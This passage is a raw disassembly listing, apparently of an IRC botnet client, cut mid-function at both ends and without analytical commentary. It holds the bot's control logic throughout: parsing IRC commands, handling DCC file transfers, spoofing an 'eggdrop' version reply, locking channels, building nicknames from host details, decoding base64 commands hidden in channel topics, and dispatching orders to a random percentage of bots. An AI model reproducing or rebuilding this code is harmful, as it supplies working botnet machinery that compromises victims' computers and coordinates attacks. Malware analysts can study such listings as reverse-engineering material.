pop ebx
retn
sub_408F4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F9D proc near ; CODE XREF: sub_4098BB+1C4�p
var_338 = byte ptr -338h
var_2BC = byte ptr -2BCh
var_260 = byte ptr -260h
var_23F = byte ptr -23Fh
var_1BC = byte ptr -1BCh
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_13F = dword ptr -13Fh
var_13B = byte ptr -13Bh
var_C1 = dword ptr -0C1h
var_BC = byte ptr -0BCh
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 338h
push ebx
push esi
mov esi, [ebp+arg_C]
push edi
push offset aPing ; "PING"
push dword ptr [esi]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_408FD0
push dword ptr [esi+4]
push offset aPongS ; "PONG %s"
loc_408FC6: ; CODE XREF: sub_408F9D+39E�j
; sub_408F9D+3FC�j ...
call sub_408E60
jmp loc_40943F
; ---------------------------------------------------------------------------
loc_408FD0: ; CODE XREF: sub_408F9D+1F�j
push offset aPong ; "PONG"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz loc_4098B6
push offset aMode ; "MODE"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz loc_4098B6
push offset aPrivmsg ; "PRIVMSG"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_4091DA
mov eax, [esi+0Ch]
xor edi, edi
cmp eax, edi
jz loc_4091DC
cmp byte ptr [eax+1], 1
jnz loc_4091DC
push offset dword_413FF0
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_40913E
mov eax, [esi+10h]
cmp eax, edi
jz loc_40913E
push offset aSend ; "SEND"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_40913E
cmp [ebp+arg_0], edi
jz loc_40913E
mov ecx, [esi+14h]
cmp ecx, edi
jz loc_4098B6
cmp [esi+18h], edi
jz loc_4098B6
cmp [esi+1Ch], edi
jz loc_4098B6
mov eax, [esi+20h]
cmp eax, edi
jz loc_4098B6
cmp byte ptr [ecx], 22h
jz loc_4098B6
push eax
call sub_410826 ; strlen
mov ecx, [esi+20h]
push [ebp+arg_4]
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_260]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_23F]
push offset dword_4177EC
push eax
call sub_410820 ; _mbscpy
push 7Ah
lea eax, [ebp+var_13B]
push edi
push eax
mov [ebp+var_13F], edi
call sub_410850 ; memset
push dword ptr [esi+18h]
mov [ebp+var_C1], 1
call sub_41088C ; atoi
movzx ecx, al
add esp, 24h
push ecx
mov ecx, eax
shr ecx, 8
movzx ecx, cl
push ecx
mov ecx, eax
shr ecx, 10h
movzx ecx, cl
shr eax, 18h
push ecx
push eax
lea eax, [ebp+var_2C]
push offset dword_412A58
push eax
call sub_410844 ; sprintf
push dword ptr [esi+20h]
lea eax, [ebp+var_2C]
push dword ptr [esi+1Ch]
push eax
lea eax, [ebp+var_260]
push dword ptr [esi+14h]
push [ebp+arg_4]
push eax
call sub_401EA8
add esp, 30h
jmp loc_4098B6
; ---------------------------------------------------------------------------
loc_40913E: ; CODE XREF: sub_408F9D+9E�j
; sub_408F9D+A9�j ...
push offset dword_413FDC
push dword ptr [esi+0Ch]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz short loc_40919E
push offset dword_413FD0
push dword ptr [esi+0Ch]
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40919E
push offset dword_413FC8
push dword ptr [esi+0Ch]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz short loc_409189
push offset dword_413FC0
push dword ptr [esi+0Ch]
call ds:dword_411110 ; lstrcmp
test eax, eax
jnz short loc_4091DC
loc_409189: ; CODE XREF: sub_408F9D+1D8�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_408C6C
jmp loc_40943F
; ---------------------------------------------------------------------------
loc_40919E: ; CODE XREF: sub_408F9D+1B2�j
; sub_408F9D+1C5�j
cmp [ebp+arg_0], edi
jz short loc_4091C3
push offset dword_41796C
push 398h
push edi
push offset dword_413F9C
push [ebp+arg_4]
call sub_408C6C
add esp, 14h
jmp loc_4098B6
; ---------------------------------------------------------------------------
loc_4091C3: ; CODE XREF: sub_408F9D+204�j
push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_413F7C
push [ebp+arg_4]
call sub_408C6C
jmp loc_4094D1
; ---------------------------------------------------------------------------
loc_4091DA: ; CODE XREF: sub_408F9D+72�j
xor edi, edi
loc_4091DC: ; CODE XREF: sub_408F9D+7F�j
; sub_408F9D+89�j ...
push offset a433 ; "433"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_409340
call sub_40639B
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, 4
mov [ebp+arg_10], eax
jnb short loc_409243
call sub_404691
test eax, eax
jnz short loc_409243
lea eax, [ebp+var_BC]
push offset loc_4177DC
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_BC]
push eax
call sub_40AC4E
lea eax, [ebp+var_BC]
push eax
call sub_408F4C
add esp, 10h
jmp loc_40932F
; ---------------------------------------------------------------------------
loc_409243: ; CODE XREF: sub_408F9D+26A�j
; sub_408F9D+273�j
call sub_4045E4
lea eax, [ebp+var_3C]
push eax
call sub_40587E
test eax, eax
pop ecx
jnz short loc_409266
lea eax, [ebp+var_3C]
push offset aUnk ; "UNK"
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_409266: ; CODE XREF: sub_408F9D+2B7�j
call sub_406096
mov ecx, 400h
cmp eax, ecx
jbe short loc_40927B
call sub_406096
jmp short loc_40927D
; ---------------------------------------------------------------------------
loc_40927B: ; CODE XREF: sub_408F9D+2D5�j
mov eax, ecx
loc_40927D: ; CODE XREF: sub_408F9D+2DC�j
shr eax, 0Ah
mov [ebp+arg_4], eax
call sub_405C57
cmp eax, 3E8h
mov ebx, offset aB ; "B"
jnb short loc_409299
mov ebx, offset aA ; "A"
loc_409299: ; CODE XREF: sub_408F9D+2F5�j
cmp eax, 1F4h
jnb short loc_4092A5
mov ebx, offset aG ; "G"
loc_4092A5: ; CODE XREF: sub_408F9D+301�j
push 24h
xor eax, eax
pop ecx
lea edi, [ebp+var_14C]
mov [ebp+var_150], 94h
xor esi, esi
rep stosd
lea eax, [ebp+var_150]
push eax
call ds:dword_411034 ; GetVersionExA
cmp [ebp+var_14C], 5
jnz short loc_4092E0
cmp [ebp+var_148], 1
jnz short loc_4092E0
push 1
pop esi
loc_4092E0: ; CODE XREF: sub_408F9D+335�j
; sub_408F9D+33E�j
push 5Ah
push 41h
call sub_40AADE
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_40AADE
pop ecx
pop ecx
test esi, esi
push eax
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_3C]
push 5Dh
push [ebp+arg_10]
push 5Bh
push 5Dh
push eax
push 5Bh
lea eax, [ebp+var_BC]
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
push eax
call sub_410844 ; sprintf
add esp, 34h
loc_40932F: ; CODE XREF: sub_408F9D+2A1�j
lea eax, [ebp+var_BC]
push eax
push offset dword_413DA8
jmp loc_408FC6
; ---------------------------------------------------------------------------
loc_409340: ; CODE XREF: sub_408F9D+250�j
push offset aError ; "ERROR"
push dword ptr [esi]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_40935F
push edi
push edi
push edi
call sub_408BA7
jmp loc_4094D1
; ---------------------------------------------------------------------------
loc_40935F: ; CODE XREF: sub_408F9D+3B3�j
push offset aJoin ; "JOIN"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
mov edi, offset byte_418B78
test eax, eax
pop ecx
jnz short loc_40939E
push edi
push [ebp+arg_4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_40939E
mov eax, [esi+8]
test eax, eax
jz short loc_40939E
cmp byte ptr [eax], 3Ah
jnz short loc_409393
inc eax
loc_409393: ; CODE XREF: sub_408F9D+3F3�j
push eax
push offset aModeSSmntu ; "MODE %s +smntu"
jmp loc_408FC6
; ---------------------------------------------------------------------------
loc_40939E: ; CODE XREF: sub_408F9D+3D8�j
; sub_408F9D+3E7�j ...
push offset a001 ; "001"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_409446
push 21h
lea eax, [ebp+var_3C]
push dword ptr [esi+8]
push eax
call sub_41083E ; strncpy
lea eax, [ebp+var_3C]
push eax
push edi
call sub_410820 ; _mbscpy
add esp, 14h
lea eax, [ebp+var_3C]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_408E60
pop ecx
pop ecx
push offset dword_418A78
push offset dword_4177EC
push offset dword_413A9C
call sub_408E60
add esp, 0Ch
lea eax, [ebp+var_1BC]
push eax
call sub_40882C
push eax
call sub_403443
pop ecx
test eax, eax
pop ecx
jz short loc_409420
lea eax, [ebp+var_1BC]
push eax
call sub_403201
test eax, eax
pop ecx
jz short loc_40942E
loc_409420: ; CODE XREF: sub_408F9D+470�j
lea eax, [ebp+var_3C]
push eax
push offset aUserhostS ; "USERHOST %s"
jmp loc_408FC6
; ---------------------------------------------------------------------------
loc_40942E: ; CODE XREF: sub_408F9D+481�j
lea eax, [ebp+var_1BC]
push eax
push offset dword_418C78
loc_40943A: ; CODE XREF: sub_408F9D+571�j
call sub_410820 ; _mbscpy
loc_40943F: ; CODE XREF: sub_408F9D+2E�j
; sub_408F9D+1FC�j ...
pop ecx
pop ecx
jmp loc_4098B6
; ---------------------------------------------------------------------------
loc_409446: ; CODE XREF: sub_408F9D+412�j
push offset a451 ; "451"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_409463
push eax
push 1
call sub_4088FC
jmp short loc_40943F
; ---------------------------------------------------------------------------
loc_409463: ; CODE XREF: sub_408F9D+4BA�j
push offset a302 ; "302"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4094D9
mov esi, [esi+0Ch]
test esi, esi
jz loc_4098B6
push offset a@ ; "@"
push esi
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_4098B6
mov esi, 100h
lea ebx, [eax+1]
push esi
mov edi, offset dword_418C78
push ebx
push edi
call sub_4052A6
lea eax, [ebp+var_1BC]
push eax
push ebx
call sub_403585
add esp, 14h
test al, al
jz loc_4098B6
lea eax, [ebp+var_1BC]
push esi
push eax
push edi
call sub_4052A6
loc_4094D1: ; CODE XREF: sub_408F9D+238�j
; sub_408F9D+3BD�j
add esp, 0Ch
jmp loc_4098B6
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_408F9D+4D7�j
push offset aNick ; "NICK"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_409513
cmp [esi+8], eax
jz loc_4098B6
push edi
push [ebp+arg_4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_4098B6
mov eax, [esi+8]
inc eax
push eax
push edi
jmp loc_40943A
; ---------------------------------------------------------------------------
loc_409513: ; CODE XREF: sub_408F9D+54D�j
push offset a332 ; "332"
push dword ptr [esi+4]
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4095FB
mov edi, [ebp+arg_10]
mov eax, [edi+10h]
test eax, eax
jz loc_4098B6
mov dl, [eax+1]
lea ecx, [eax+1]
test dl, dl
jz loc_4098B6
cmp dl, 3Dh
jnz short loc_409591
add eax, 2
push ecx
push eax
call sub_409AD3
push eax
mov eax, [edi+10h]
inc eax
push eax
call sub_409EB3
mov ebx, eax
mov eax, [edi+10h]
inc eax
push ebx
push eax
call sub_409E33
mov eax, [edi+14h]
add esp, 18h
test eax, eax
jz short loc_409589
push eax
mov eax, [edi+10h]
lea eax, [eax+ebx+1]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
jmp short loc_409591
; ---------------------------------------------------------------------------
loc_409589: ; CODE XREF: sub_408F9D+5D8�j
mov eax, [edi+10h]
and byte ptr [eax+ebx+1], 0
loc_409591: ; CODE XREF: sub_408F9D+5AC�j
; sub_408F9D+5EA�j
mov edi, [edi+10h]
cmp byte ptr [edi+1], 0
lea eax, [edi+1]
jz loc_4098B6
lea ecx, [ebp+arg_4]
mov edi, offset asc_413F20 ; "]["
push ecx
push edi
push eax
call sub_405733
add esp, 0Ch
loc_4095B4: ; CODE XREF: sub_408F9D+65C�j
test eax, eax
jz loc_4098B6
loc_4095BC: ; CODE XREF: sub_408F9D+625�j
cmp byte ptr [eax], 20h
jnz short loc_4095C4
inc eax
jmp short loc_4095BC
; ---------------------------------------------------------------------------
loc_4095C4: ; CODE XREF: sub_408F9D+622�j
push eax
lea eax, [ebp+var_2BC]
push dword ptr [esi+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_2BC]
push eax
call sub_4098BB
lea eax, [ebp+arg_4]
push eax
push edi
push 0
call sub_405733
add esp, 24h
jmp short loc_4095B4
; ---------------------------------------------------------------------------
loc_4095FB: ; CODE XREF: sub_408F9D+587�j
cmp [ebp+arg_0], 0
jz loc_4098B6
cmp dword ptr [esi+8], 0
jz loc_4098B6
cmp dword ptr [esi+0Ch], 0
lea ebx, [esi+0Ch]
jz loc_4098B6
push offset byte_418B78
push [ebp+arg_4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz loc_4098B6
mov eax, [ebp+arg_10]
inc dword ptr [ebx]
add eax, 0Ch
push offset aPrivmsg ; "PRIVMSG"
mov [ebp+var_14], eax
inc dword ptr [eax]
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
pop ecx
push 3
test eax, eax
pop edi
jnz short loc_40966C
mov eax, [ebx]
cmp byte ptr [eax], 1
jz short loc_40968A
mov eax, [esi+8]
and [ebp+var_4], 0
mov [ebp+arg_0], eax
jmp loc_409718
; ---------------------------------------------------------------------------
loc_40966C: ; CODE XREF: sub_408F9D+6B7�j
push offset aNotice ; "NOTICE"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_4098B6
mov eax, [ebx]
cmp byte ptr [eax], 1
jnz short loc_4096CF
loc_40968A: ; CODE XREF: sub_408F9D+6BE�j
mov ecx, [ebp+arg_4]
inc eax
mov [ebx], eax
mov eax, [ebp+var_14]
mov [ebp+var_4], edi
xor edi, edi
inc dword ptr [eax]
cmp [esi], edi
mov [ebp+arg_0], ecx
jz short loc_4096F8
mov [ebp+arg_C], esi
loc_4096A4: ; CODE XREF: sub_408F9D+72E�j
cmp edi, 0Fh
jz short loc_4096F8
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_410826 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
cmp byte ptr [ecx+eax-1], 1
jz short loc_4096DE
add [ebp+arg_C], 4
inc edi
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0
jnz short loc_4096A4
jmp short loc_4096F8
; ---------------------------------------------------------------------------
loc_4096CF: ; CODE XREF: sub_408F9D+6EB�j
mov eax, [esi+8]
mov [ebp+var_4], 1
mov [ebp+arg_0], eax
jmp short loc_409718
; ---------------------------------------------------------------------------
loc_4096DE: ; CODE XREF: sub_408F9D+721�j
mov ecx, edi
shl ecx, 2
mov edx, [ecx+esi]
and byte ptr [edx+eax-1], 0
mov edx, [ebp+arg_10]
mov ecx, [ecx+edx]
and byte ptr [ecx+eax-1], 0
jmp short loc_409718
; ---------------------------------------------------------------------------
loc_4096F8: ; CODE XREF: sub_408F9D+702�j
; sub_408F9D+70A�j ...
mov eax, [ebp+arg_10]
shl edi, 2
push dword ptr [edi+eax]
call sub_410826 ; strlen
pop ecx
mov ecx, [edi+esi]
cmp byte ptr [ecx+eax-1], 1
lea eax, [ecx+eax-1]
jnz short loc_409718
mov byte ptr [eax], 1
loc_409718: ; CODE XREF: sub_408F9D+6CA�j
; sub_408F9D+73F�j ...
push offset byte_418B78
push [ebp+arg_0]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_409731
mov eax, [ebp+arg_4]
mov [ebp+arg_0], eax
loc_409731: ; CODE XREF: sub_408F9D+78C�j
push 7Ah
lea eax, [ebp+var_338]
push 0
push eax
call sub_410850 ; memset
mov eax, [ebp+arg_10]
and [ebp+arg_C], 0
mov edi, [eax]
push edi
mov [ebp+var_18], edi
call sub_410826 ; strlen
add esp, 10h
cmp eax, 3
mov [ebp+var_10], eax
jb loc_409807
loc_409762: ; CODE XREF: sub_408F9D+7FF�j
mov cl, [eax+edi-1]
cmp cl, 20h
jnz short loc_40976E
dec eax
jmp short loc_409796
; ---------------------------------------------------------------------------
loc_40976E: ; CODE XREF: sub_408F9D+7CC�j
cmp byte ptr [eax+edi-3], 20h
jnz short loc_40979E
cmp byte ptr [eax+edi-2], 2Dh
jnz short loc_40979E
cmp cl, 7Ah
jg short loc_40979E
movsx ecx, cl
mov [ebp+arg_C], 1
sub eax, 3
mov [ebp+ecx+var_338], 1
loc_409796: ; CODE XREF: sub_408F9D+7CF�j
cmp eax, 3
mov [ebp+var_10], eax
jnb short loc_409762
loc_40979E: ; CODE XREF: sub_408F9D+7D6�j
; sub_408F9D+7DD�j ...
cmp [ebp+arg_C], 0
jz short loc_409807
mov edi, [ebp+arg_10]
and [ebp+var_C], 0
mov [ebp+var_8], esi
sub [ebp+var_8], edi
loc_4097B1: ; CODE XREF: sub_408F9D+868�j
mov eax, [edi]
test eax, eax
jz short loc_409807
mov ecx, [ebp+var_10]
mov edx, [ebp+var_18]
add ecx, edx
cmp eax, ecx
jb short loc_4097FB
xor ecx, ecx
cmp [ebp+arg_C], ecx
jz short loc_4097E8
cmp [ebp+var_C], ecx
jz short loc_4097E5
mov eax, [ebp+var_8]
push dword ptr [eax+edi-4]
call sub_410826 ; strlen
pop ecx
mov ecx, [edi-4]
and byte ptr [eax+ecx], 0
xor ecx, ecx
loc_4097E5: ; CODE XREF: sub_408F9D+830�j
mov [ebp+arg_C], ecx
loc_4097E8: ; CODE XREF: sub_408F9D+82B�j
mov eax, [edi]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
add eax, edi
mov edx, [eax]
and byte ptr [edx], 0
mov [edi], ecx
mov [eax], ecx
loc_4097FB: ; CODE XREF: sub_408F9D+824�j
inc [ebp+var_C]
add edi, 4
cmp [ebp+var_C], 10h
jb short loc_4097B1
loc_409807: ; CODE XREF: sub_408F9D+7BF�j
; sub_408F9D+805�j ...
mov edi, offset byte_418B78
push edi
push dword ptr [esi+8]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_409821
push [ebp+var_14]
push ebx
jmp short loc_40989B
; ---------------------------------------------------------------------------
loc_409821: ; CODE XREF: sub_408F9D+87C�j
add esi, 10h
cmp dword ptr [esi], 0
jz loc_4098B6
push offset asc_413F14 ; "*"
push dword ptr [ebx]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz short loc_409893
push dword ptr [ebx]
push edi
call sub_4071EF
pop ecx
test al, al
pop ecx
jnz short loc_409893
push dword ptr [ebx]
call sub_410826 ; strlen
cmp eax, 4
pop ecx
ja short loc_4098B6
mov edi, [ebx]
push edi
call sub_410826 ; strlen
cmp byte ptr [eax+edi-1], 25h
pop ecx
jnz short loc_4098B6
push edi
call sub_410826 ; strlen
mov ecx, [ebx]
and byte ptr [eax+ecx-1], 0
call sub_40AB05
push 64h
xor edx, edx
pop ecx
div ecx
push dword ptr [ebx]
mov edi, edx
inc edi
call sub_41088C ; atoi
pop ecx
cmp eax, edi
pop ecx
jl short loc_4098B6
loc_409893: ; CODE XREF: sub_408F9D+8A0�j
; sub_408F9D+8AE�j
mov eax, [ebp+arg_10]
add eax, 10h
push eax
push esi
loc_40989B: ; CODE XREF: sub_408F9D+882�j
lea eax, [ebp+var_338]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40735A
add esp, 1Ch
loc_4098B6: ; CODE XREF: sub_408F9D+44�j
; sub_408F9D+5B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_408F9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098BB proc near ; CODE XREF: sub_408406+70�p
; sub_408F9D+648�p ...
var_1184 = byte ptr -1184h
var_184 = byte ptr -184h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_78 = dword ptr -78h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1184h
call sub_4108B0
push ebx
lea eax, [ebp+var_84]
push 10h
push eax
lea eax, [ebp+var_44]
xor ebx, ebx
push eax
lea eax, [ebp+var_1184]
push eax
mov [ebp+var_4], ebx
push [ebp+arg_0]
call sub_4051D2
push offset a302 ; "302"
push [ebp+var_40]
call sub_410C94 ; _strcmpi
add esp, 1Ch
neg eax
sbb eax, eax
inc eax
cmp [ebp+var_44], ebx
mov dword_4186DC, eax
jz loc_409A89
cmp [ebp+var_40], ebx
jz loc_409A89
push esi
push edi
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_40]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz short loc_40993E
push offset aNotice ; "NOTICE"
push [ebp+var_40]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4099B0
loc_40993E: ; CODE XREF: sub_4098BB+6E�j
mov eax, [ebp+var_38]
cmp eax, ebx
jz short loc_4099B0
cmp [ebp+var_34], ebx
jnz short loc_4099B0
cmp byte ptr [eax], 3Ah
jnz short loc_4099B0
cmp byte ptr [eax+1], 3Dh
jnz short loc_4099B0
add eax, 2
cmp byte ptr [eax], 0
jz short loc_4099B0
push eax
call sub_409C55
test eax, eax
pop ecx
jz short loc_4099B0
mov eax, [ebp+var_38]
lea ecx, [eax+1]
add eax, 2
push ecx
push eax
call sub_409AD3
push eax
mov eax, [ebp+var_38]
inc eax
push eax
call sub_409EB3
mov esi, eax
mov eax, [ebp+var_38]
inc eax
push esi
push eax
call sub_409E33
mov eax, [ebp+var_38]
push 0Dh
and byte ptr [esi+eax+1], 0
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_38]
push eax
push [ebp+var_78]
push [ebp+var_38]
call sub_4051D2
add esp, 2Ch
loc_4099B0: ; CODE XREF: sub_4098BB+81�j
; sub_4098BB+88�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_44]
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409A0E
cmp off_4177AC, ebx
jz short loc_409A15
mov esi, offset off_4177AC
mov edi, esi
loc_4099D2: ; CODE XREF: sub_4098BB+142�j
push dword ptr [edi]
call sub_40AC4E
mov eax, [ebp+var_44]
push dword ptr [edi]
inc eax
push eax
call sub_407187
add esp, 0Ch
test al, al
jnz short loc_409A01
push dword ptr [esi]
call sub_40AC15
add esi, 4
inc ebx
pop ecx
mov edi, esi
cmp dword ptr [esi], 0
jnz short loc_4099D2
jmp short loc_409A15
; ---------------------------------------------------------------------------
loc_409A01: ; CODE XREF: sub_4098BB+12F�j
push off_4177AC[ebx*4]
call sub_40AC15
pop ecx
loc_409A0E: ; CODE XREF: sub_4098BB+106�j
mov [ebp+var_4], 1
loc_409A15: ; CODE XREF: sub_4098BB+10E�j
; sub_4098BB+144�j
push 1
lea esi, [ebp+var_184]
xor edi, edi
pop eax
dec esi
loc_409A21: ; CODE XREF: sub_4098BB+198�j
mov ecx, [ebp+var_44]
add ecx, eax
cmp byte ptr [ecx], 21h
jnz short loc_409A36
and [ebp+eax+var_105], 0
push 1
pop edi
loc_409A36: ; CODE XREF: sub_4098BB+16E�j
test edi, edi
jnz short loc_409A43
mov dl, [ecx]
mov [ebp+eax+var_105], dl
loc_409A43: ; CODE XREF: sub_4098BB+17D�j
mov dl, [ecx]
mov [esi+eax], dl
cmp byte ptr [ecx], 0
jz short loc_409A55
inc eax
cmp eax, 80h
jl short loc_409A21
loc_409A55: ; CODE XREF: sub_4098BB+190�j
lea eax, [ebp+var_84]
and [ebp+var_85], 0
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_184]
and [ebp+var_105], 0
push eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_4]
call sub_408F9D
add esp, 14h
pop edi
pop esi
loc_409A89: ; CODE XREF: sub_4098BB+4C�j
; sub_4098BB+55�j
pop ebx
leave
retn
sub_4098BB endp
; =============== S U B R O U T I N E =======================================
sub_409A8C proc near ; CODE XREF: seg000:00410798�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
cmp byte ptr [edi], 0
jz short loc_409AAF
push esi
loc_409A97: ; CODE XREF: sub_409A8C+20�j
push edi
call sub_40535A
push edi
mov esi, eax
call sub_4098BB
cmp byte ptr [esi], 0
pop ecx
pop ecx
mov edi, esi
jnz short loc_409A97
pop esi
loc_409AAF: ; CODE XREF: sub_409A8C+8�j
pop edi
retn
sub_409A8C endp
; =============== S U B R O U T I N E =======================================
sub_409AB1 proc near ; CODE XREF: seg000:00410620�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4186E0
rep stosd
pop edi
loc_409ABF: ; CODE XREF: sub_409AB1+1F�j
movzx ecx, byte_414030[eax]
mov byte_4186E0[ecx], al
inc eax
cmp eax, 40h
jb short loc_409ABF
retn
sub_409AB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD3 proc near ; CODE XREF: sub_40735A+253�p
; sub_40735A+649�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push esi
call sub_410826 ; strlen
cmp eax, 2
pop ecx
mov [ebp+arg_0], eax
jnb short loc_409AF0
xor eax, eax
jmp loc_409B9C
; ---------------------------------------------------------------------------
loc_409AF0: ; CODE XREF: sub_409AD3+14�j
push ebx
push edi
push 1
xor edx, edx
xor ecx, ecx
pop edi
loc_409AF9: ; CODE XREF: sub_409AD3+BF�j
inc edx
cmp edi, [ebp+arg_0]
jnb loc_409B97
movsx ebx, byte ptr [ecx+esi]
mov eax, [ebp+arg_4]
mov bl, byte_4186E0[ebx]
shl bl, 2
lea eax, [eax+edx-1]
inc ecx
inc edi
cmp ecx, [ebp+arg_0]
mov [eax], bl
jnb short loc_409B97
movsx ebx, byte ptr [ecx+esi]
mov bl, byte_4186E0[ebx]
shr bl, 4
or [eax], bl
inc edx
cmp edi, [ebp+arg_0]
jnb short loc_409B97
movsx ebx, byte ptr [ecx+esi]
mov eax, [ebp+arg_4]
mov bl, byte_4186E0[ebx]
shl bl, 4
lea eax, [eax+edx-1]
inc ecx
inc edi
cmp ecx, [ebp+arg_0]
mov [eax], bl
jnb short loc_409B97
movsx ebx, byte ptr [ecx+esi]
mov bl, byte_4186E0[ebx]
shr bl, 2
or [eax], bl
inc edx
cmp edi, [ebp+arg_0]
jnb short loc_409B97
movsx ebx, byte ptr [ecx+esi]
mov eax, [ebp+arg_4]
mov bl, byte_4186E0[ebx]
shl bl, 6
lea eax, [eax+edx-1]
inc ecx
inc edi
cmp ecx, [ebp+arg_0]
mov [eax], bl
jnb short loc_409B97
movsx ebx, byte ptr [ecx+esi]
mov bl, byte_4186E0[ebx]
or [eax], bl
inc ecx
inc edi
jmp loc_409AF9
; ---------------------------------------------------------------------------
loc_409B97: ; CODE XREF: sub_409AD3+2A�j
; sub_409AD3+4B�j ...
pop edi
lea eax, [edx-1]
pop ebx
loc_409B9C: ; CODE XREF: sub_409AD3+18�j
pop esi
pop ebp
retn
sub_409AD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409B9F proc near ; CODE XREF: sub_40735A+1D8�p
; sub_40735A+5AB�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov edx, [ebp+arg_4]
push 1
movzx eax, byte ptr [edi]
shr eax, 2
pop esi
mov al, byte_414030[eax]
mov [edx], al
mov cl, [edi]
and cl, 3
mov eax, esi
shl cl, 4
cmp [ebp+arg_8], esi
jz short loc_409C3C
loc_409BCB: ; CODE XREF: sub_409B9F+9B�j
movzx ebx, byte ptr [esi+edi]
movzx ecx, cl
shr ebx, 4
or ebx, ecx
mov cl, byte_414030[ebx]
mov [eax+edx], cl
